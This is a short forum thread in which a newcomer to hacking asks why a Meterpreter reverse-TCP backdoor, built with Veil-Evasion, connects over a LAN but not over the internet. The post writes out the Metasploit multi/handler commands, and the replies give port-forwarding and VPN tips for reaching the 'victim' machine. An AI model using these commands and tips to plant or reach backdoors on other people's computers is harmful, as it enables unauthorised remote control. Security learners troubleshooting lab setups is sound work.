Forum Thread: Sending Stage Stucked Metasploid

Hi ! I'm new on hacking and I'm stcuking with metasploit. Indeed, I succeeded meterpreter with backdoor in LAN, but WAN it doesn't work...

I make my backdoor with Veil-Evasion, with python/meterpreter/rev tcp, with my external IP and the 80 port.
With metasploit, I made those commands :
use multi/handler
set payload windows/meterpreter/reverse tcp
set lhost (my private IP)
set lport 80

Also, I made port forwarding on my router, TCP 80 external and internal ports...
I opened the 80 port with a http website...

After that, I type "exploit", I execute the backdoor on the computer and I've :
Sending stage (983599 bytes) to (external ip)
But no session can be opened !

Someone can help me...?
I already try iptables just in case (I studied that), but no success...

6 Responses

change the port to something else just to verify.

if your two computers, the victim and the attacker, are on the same network....IT WILL NOT WORK because the IP is the same

the solution?
connect the victim machine to a VPN service. I usually use www.vpnbook.com/freevpn

Thanks for your answers.

I already changed the port to 443 and 4444, but same thing...
With permission, I already with a computer external of my network, same thing too...

Edit : I checked the ports and 80/443 is closed... To open this, a web page http (for 80) or https (443) isn't enough ?

open the port on your router, setup the multi/hanler to listen for incoming connections then go to THIS WEBSITE to check if your port is open. if it's green, you're good to go...if it returns red, then you're not doing it right

Yes but if the computer is external to my network, how can I open this port ? The backdoor is useless so :/

Edit : sorry, I didn't understand... x)
Okay so with multi/handler, the ports of my Kali are opened, but for the victim, how can I open this ?

Share Your Thoughts

  • Hot
  • Active